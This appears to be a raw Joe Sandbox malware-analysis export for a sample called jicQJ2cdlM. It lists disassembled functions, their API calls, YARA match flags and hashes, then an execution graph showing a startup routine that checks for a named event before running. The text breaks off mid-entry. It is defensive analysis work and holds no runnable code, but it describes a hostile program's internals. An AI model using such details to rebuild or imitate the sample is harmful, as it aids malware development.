                                                                                    • API ID:
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 0-711371036
                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction ID: dbb3e87d6ada4d3e7e77450192123ce3ce23e49f73a6c8396692219387236e3c
                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction Fuzzy Hash: E221AF72A60104B6EB24CF658D25BD772AAEF94B60F578624E909D7200F732DEC0C3B0
                                                                                    Function 00401F26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F41
                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F66
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodersGdipImage$Size
                                                                                    • String ID: image/png
                                                                                    • API String ID: 864223233-2966254431
                                                                                    • Opcode ID: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                    • Instruction ID: 499c26c8a42b7bd5ccc1bf70bc14c74cf5c012d897e463d4ef063c4de499c351
                                                                                    • Opcode Fuzzy Hash: 896ca310b2d930f63a5eabfafad02fd990c57be0705be7f150b4b226794c9691
                                                                                    • Instruction Fuzzy Hash: 73119176D0410ABFCB019FA9988189EBB76EE41321B60027BE810B32A0C7795E559A58
                                                                                    Function 009EF1B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000000D,?,009EE0CD,009EC8E5,?,?,00000000,?,009EC7B5,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,009EC8E5), ref: 009EF236
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1452528299-1785270423
                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction ID: 8693fc83c02c618bc11637a78adec162a0a1b451d2a5c1dd1c40516ecf80483f
                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction Fuzzy Hash: 44118E3B20026AEFCF175F65DC6496ABB69FF09B16B10443AFA2596210CB719C109BA0
                                                                                    Function 009FDB74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009F0F85: RtlEnterCriticalSection.NTDLL ref: 009F0F86
                                                                                    • List.LIBCONCRT ref: 009FDBCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalEnterListSection
                                                                                    • String ID: +$D$11@
                                                                                    • API String ID: 2909958271-3688954461
                                                                                    • Opcode ID: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                    • Instruction ID: ac40e229390ae6e8bf42d908e71dbffbadfa0fa2926332678804521af35960df
                                                                                    • Opcode Fuzzy Hash: 202ad810f09b455ae9d35922495593e33a197e3d39888fc6707643b4f93c0e82
                                                                                    • Instruction Fuzzy Hash: D2212C75A00219CFCF04EF68C585AADB7B5FF88310B154469E906AB352CB70EA45CF90
                                                                                    Function 00410EB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: SpinWait
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2810355486-1785270423
                                                                                    • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction ID: 2c89d4891b65b71c58f4df53b819bdc9dd2f83fb67093c95cbfc0296fa784990
                                                                                    • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction Fuzzy Hash: 2001B5315147228FCA355F3AE5197ABBBD1EB01721B14892FE05683764C6E9DCC2CB88
                                                                                    Function 009F111F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SpinWait
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2810355486-1785270423
                                                                                    • Opcode ID: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction ID: 8d22df24f644f03797246040cfcdece639f1f4550e7188f392b1f8b66daa82e8
                                                                                    • Opcode Fuzzy Hash: 29a75abf41ee9a1be823ea049822ab3759e986b0ee5abe1ab6e190251c7ebecc
                                                                                    • Instruction Fuzzy Hash: 1101B531B1862ADFCB259F39D908776BBD4EB11721F14852DD35683664CA61DC40CBC0
                                                                                    Function 004353E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,23E85006,00000001,?,?), ref: 00435451
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: String
                                                                                    • String ID: 11@$LCMapStringEx
                                                                                    • API String ID: 2568140703-3516914342
                                                                                    • Opcode ID: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                    • Instruction ID: 91de7e3331bdbfbcb41da95f7e05f6e44d66f1f0f0f9d36e296516fe988f38a3
                                                                                    • Opcode Fuzzy Hash: e8517c0d616e0df9a4033924f494529b67a61b9f75405e460d1b1d91209c0164
                                                                                    • Instruction Fuzzy Hash: 2B014C32540209BBCF069F90CD06EEE7FA2EF1C755F148166FE0425161C6BA8931EF89
                                                                                    Function 0040C535 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C579
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_destroy
                                                                                    • String ID: f(@$ios_base::failbit set
                                                                                    • API String ID: 4194217158-3705395444
                                                                                    • Opcode ID: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                    • Instruction ID: dc76fbcea74a86ab5df7bd62cc1bfab07110206e2b1f370d9d208192458b19b9
                                                                                    • Opcode Fuzzy Hash: d500ab467568cc089f2f810d33affd2ebfdf54b471f9d9af73e546eb9498b0b3
                                                                                    • Instruction Fuzzy Hash: 2BF0B4B2A0022836D2202A56BC41B92F7CC8F40B68F10443FFD04A7682EAF8A94541A8
                                                                                    Function 009FDC92 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FDCDA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FDCE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1687795959-1785270423
                                                                                    • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction ID: 08507995d46092ae1eccb6071ef8e1b84aae51b4dd58495297ac7192c51f9226
                                                                                    • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction Fuzzy Hash: 27F0E9397005195BCB04EB59DC85C6DF7ADAF85B613110076FA42D3352DBB4ED058794
                                                                                    Function 0043524A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,0043A95A,?,00000055,00000050), ref: 00435294
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: DefaultUser
                                                                                    • String ID: 11@$GetUserDefaultLocaleName
                                                                                    • API String ID: 3358694519-96072240
                                                                                    • Opcode ID: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                    • Instruction ID: 56ecbbb9c6e0ea3c164d002f9608a712f4b6e8dd4fbc805ea42157dacaae974e
                                                                                    • Opcode Fuzzy Hash: 16a0718fbd455e8dc7f79371a647250a910ba3e014e61bb6336f7cb34782cdd6
                                                                                    • Instruction Fuzzy Hash: 3DF02431A80208BBDB10AF51CC03F9E7F50EB09B50F10416AFD046A291DAB95E209ACD
                                                                                    Function 00435313 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(00000000,00430853,00000000,00000001,?,?,00430853,?,?,00430233,?,00000004), ref: 0043535F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: LocaleValid
                                                                                    • String ID: 11@$IsValidLocaleName
                                                                                    • API String ID: 1901932003-3041995494
                                                                                    • Opcode ID: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                    • Instruction ID: 92ee9c0e94e9f2fbea2cc18d2d1159cfcb308c2a760149ff5b58bb71b949f05c
                                                                                    • Opcode Fuzzy Hash: ec0c667621164707c1bc2b991c274cf4e18bf7ac853b3eeeb1e3ed5b34663cf6
                                                                                    • Instruction Fuzzy Hash: 94F02430A84708B7DB10AB108D07B9EBB549B48B12F10403ABD0066281CAF95911A59D
                                                                                    Function 004352B1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0043255D,-00000020,00000FA0,00000000,00000014,00402866), ref: 004352FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: 11@$InitializeCriticalSectionEx
                                                                                    • API String ID: 2593887523-3358978645
                                                                                    • Opcode ID: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                    • Instruction ID: 2051ed9e425ee247f5129d915950feebf7d6a3be7f43922744b44a15a137ba2f
                                                                                    • Opcode Fuzzy Hash: 4941b3bd5492a3ccd0429f2016fdf03f36fccdd9fbf1eb1f29f14e59228ea09c
                                                                                    • Instruction Fuzzy Hash: 2FF0B431A40208BBDB11AF51DD02D9F7F61EB08B51F10406AFD0556260DABA4E20EAC9
                                                                                    Function 004406AA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3886170330-2084237596
                                                                                    • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction ID: 34e8bc77d22ddcdafc14714ce60d9b0db4004f50fe154a236d7873180d633bee
                                                                                    • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction Fuzzy Hash: 83F06274600124DFDB22AF65D40159D7BB0AF41748F8640EBF5045B3A1C77C6D54CFAA
                                                                                    Function 004350DB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Free
                                                                                    • String ID: 11@$FlsFree
                                                                                    • API String ID: 3978063606-2352678666
                                                                                    • Opcode ID: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                    • Instruction ID: c1727abd3399064533d4b72406d339915fd92446a3417b7bd4380397cab03c3a
                                                                                    • Opcode Fuzzy Hash: 6dffc1cdda050d1ef236ec52a9cd275bb2632aad14ca1d18400e2b4c69ec58df
                                                                                    • Instruction Fuzzy Hash: 0FE0E532F41218ABD714AF559C07A6EBB60DB48F15F14017BFE0557281DA794E1096CE
                                                                                    Function 00435085 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: 11@$FlsAlloc
                                                                                    • API String ID: 2773662609-288891599
                                                                                    • Opcode ID: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                    • Instruction ID: 656933edcbb05ac72b6cf25421a562d2aaaa3326236b7023487c433eafd234ee
                                                                                    • Opcode Fuzzy Hash: ba89461f714ec2f353eb854be2fff552b03e75bb0e63386cb5f1b0964f268f00
                                                                                    • Instruction Fuzzy Hash: 62E05C30B8170477D314AF518C03A6EB760DB0AB11F10017BFC0127280DDBD5E1085CE
                                                                                    Function 00429FC5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • try_get_function.LIBVCRUNTIME ref: 00429FDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: try_get_function
                                                                                    • String ID: 11@$FlsAlloc
                                                                                    • API String ID: 2742660187-288891599
                                                                                    • Opcode ID: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                    • Instruction ID: 02976f814a59a294967572ff2c8846d3634fef9e4185a681c56ac9216c02fddb
                                                                                    • Opcode Fuzzy Hash: 8626dcbe6cdd30c54ada29f8a24cae781a39f5398ca56e55a922e5d7310b92a8
                                                                                    • Instruction Fuzzy Hash: BDD0C231BC973663D5406B816D02B99BA048701FA3F110063F90CA1281D6994A1046CD
                                                                                    Function 004212DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212FB
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00421309
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: pThreadProxy
                                                                                    • API String ID: 1687795959-3651400591
                                                                                    • Opcode ID: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                    • Instruction ID: 5420a3ac49ee2b21aafe02425b7e31d130dadcb6d03c7143bde2fe2a0427303a
                                                                                    • Opcode Fuzzy Hash: d978fa9c7b04847c80681c11cf36977db16e70b896a80dd6198ffb22ffb34018
                                                                                    • Instruction Fuzzy Hash: 8FD05B71E0020896D700EBB9D806E4E77A85B10718F50417B7D14E6147DF78E508C6A8
                                                                                    Function 0041A897 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::ContextBase::CancellationBeaconStack::~CancellationBeaconStack.LIBCONCRT ref: 0041A8A1
                                                                                    • Hash.LIBCONCRT ref: 0041A8AE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeaconCancellation$Base::Concurrency::details::ContextHashStackStack::~
                                                                                    • String ID: +hB
                                                                                    • API String ID: 3232699325-4272926976
                                                                                    • Opcode ID: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                    • Instruction ID: 63ff50f5f99ebaa442bb0d4aeec8a7224868785c63155d6932f4acb55241cc7c
                                                                                    • Opcode Fuzzy Hash: 7ad862fe756be090a11e09584eb2edb8185e7db7bb7af1f5538142d7ac1213cc
                                                                                    • Instruction Fuzzy Hash: 2DD0A73230451156C708772AF8019C9F761BF80710B11403FE455935518F3838AF869D
                                                                                    Function 004394DD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandLine
                                                                                    • String ID: `%~
                                                                                    • API String ID: 3253501508-3906510574
                                                                                    • Opcode ID: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                    • Instruction ID: a72b382a13dd36543230f851506b27d64c175e456db285366795c2c72c230a95
                                                                                    • Opcode Fuzzy Hash: 7496f3f1f43a5bc4f5ff7b5e8a7696d052f6bc66573cc841d28ce311f0d10aa6
                                                                                    • Instruction Fuzzy Hash: 15B0487C8003008BC7108F28AA081043AA0BA0BA0338002B5D4099233AD734A1008E08
                                                                                    Function 0042AEAA Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,f(@,00000000), ref: 0042AF40
                                                                                    • GetLastError.KERNEL32 ref: 0042AF4E
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AFA9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                    • Instruction ID: 120bd2143bdce8d71afc71d227a82de2ececf14487395c5eb9abd3a2316ebb2c
                                                                                    • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                    • Instruction Fuzzy Hash: 00414830700621EFCF228F66E944B6BBBA4EF01714F95416BFC699B290D7388D01C79A
                                                                                    Function 00A0B111 Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,009E2ACD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,009E2ACD,00000000), ref: 00A0B1A7
                                                                                    • GetLastError.KERNEL32 ref: 00A0B1B5
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,009E2ACD,00000000), ref: 00A0B210
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1717984340-0
                                                                                    • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                    • Instruction ID: 7abf3d8db3c7e02363c666045a5ac928c6fc794baf52ed2edc702ba323c8996b
                                                                                    • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                    • Instruction Fuzzy Hash: 0541C275A1020AEFCF218F64EA946BE7BA4EF16711F154269E859A71E1DB308D01CB70

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.6%
                                                                                    Dynamic/Decrypted Code Coverage:4.7%
                                                                                    Signature Coverage:1%
                                                                                    Total number of Nodes:1415
                                                                                    Total number of Limit Nodes:28
                                                                                    execution_graph 27605 409440 strlen malloc strcpy_s free std::exception::exception 27663 2d230d0 9 API calls 27666 41ce48 LeaveCriticalSection _raise 27667 2d23823 9 API calls 27608 41b050 6 API calls 3 library calls 27643 2d213c7 strtok_s strtok_s 27670 2d2102b StrCmpCA strtok_s 27704 406f60 memcpy 27614 41dc60 atexit 27705 410765 279 API calls 27672 417667 lstrcpy 27673 2d230f9 7 API calls 27674 41b270 5 API calls 2 library calls 27711 2d219e7 StrCmpCA ExitProcess strtok_s StrCmpCA strtok_s 27712 2d235e4 9 API calls 27676 2d2cce9 162 API calls getSystemCP 27617 2d2ae93 43 API calls ctype 27618 2d20297 149 API calls 27620 41bc11 71 API calls 2 library calls 27677 2d23823 6 API calls 27713 2d2118b strtok_s StrCmpCA strtok_s lstrlen lstrcpy 27678 2d2102b StrCmpCA StrCmpCA strtok_s 27714 2d2cd8f 6 API calls 2 library calls 27680 2d20cb6 30 API calls 27681 2d204b7 88 API calls 27624 2d16ebc VirtualProtect 27625 41ac2c 71 API calls ctype 27716 2d2cd90 173 API calls 3 library calls 27626 2d232ae 22 API calls 27684 2d2d0af RtlLeaveCriticalSection _raise 27685 2d2140b strtok_s 27627 4090c3 5 API calls allocator 27687 2d26c57 690 API calls 27718 2d26d18 644 API calls 27688 2d2102b StrCmpCA strtok_s lstrlen lstrcpy 27629 2d23b7d 91 API calls 2 library calls 27720 41abd0 free std::exception::_Tidy ctype 27630 2d26a40 6 API calls 27721 413916 91 API calls 2 library calls 27722 4183dc 15 API calls 27631 2d2cd97 170 API calls 2 library calls 27632 4090e7 memcpy RaiseException codecvt __CxxThrowException@8 27633 2d2be78 162 API calls 2 library calls 27692 41ceea SetUnhandledExceptionFilter 26145 4169f0 26188 402260 26145->26188 26162 417850 3 API calls 26163 416a30 26162->26163 26164 4178e0 3 API calls 26163->26164 26165 416a43 26164->26165 26321 41a9b0 26165->26321 26167 416a64 26168 41a9b0 4 API calls 26167->26168 26169 416a6b 26168->26169 26170 41a9b0 4 API calls 26169->26170 26171 416a72 26170->26171 26172 41a9b0 4 API calls 26171->26172 26173 416a79 26172->26173 26174 41a9b0 4 API calls 26173->26174 26175 416a80 26174->26175 26329 41a8a0 26175->26329 26177 416b0c 26333 416920 GetSystemTime 26177->26333 26178 416a89 26178->26177 26180 416ac2 OpenEventA 26178->26180 26183 416af5 CloseHandle Sleep 26180->26183 26184 416ad9 26180->26184 26186 416b0a 26183->26186 26187 416ae1 CreateEventA 26184->26187 26185 416b16 CloseHandle ExitProcess 26186->26178 26187->26177 26530 4045c0 17 API calls 26188->26530 26190 402274 26191 4045c0 34 API calls 26190->26191 26192 40228d 26191->26192 26193 4045c0 34 API calls 26192->26193 26194 4022a6 26193->26194 26195 4045c0 34 API calls 26194->26195 26196 4022bf 26195->26196 26197 4045c0 34 API calls 26196->26197 26198 4022d8 26197->26198 26199 4045c0 34 API calls 26198->26199 26200 4022f1 26199->26200 26201 4045c0 34 API calls 26200->26201 26202 40230a 26201->26202 26203 4045c0 34 API calls 26202->26203 26204 402323 26203->26204 26205 4045c0 34 API calls 26204->26205 26206 40233c 26205->26206 26207 4045c0 34 API calls 26206->26207 26208 402355 26207->26208 26209 4045c0 34 API calls 26208->26209 26210 40236e 26209->26210 26211 4045c0 34 API calls 26210->26211 26212 402387 26211->26212 26213 4045c0 34 API calls 26212->26213 26214 4023a0 26213->26214 26215 4045c0 34 API calls 26214->26215 26216 4023b9 26215->26216 26217 4045c0 34 API calls 26216->26217 26218 4023d2 26217->26218 26219 4045c0 34 API calls 26218->26219 26220 4023eb 26219->26220 26221 4045c0 34 API calls 26220->26221 26222 402404 26221->26222 26223 4045c0 34 API calls 26222->26223 26224 40241d 26223->26224 26225 4045c0 34 API calls 26224->26225 26226 402436 26225->26226 26227 4045c0 34 API calls 26226->26227 26228 40244f 26227->26228 26229 4045c0 34 API calls 26228->26229 26230 402468 26229->26230 26231 4045c0 34 API calls 26230->26231 26232 402481 26231->26232 26233 4045c0 34 API calls 26232->26233 26234 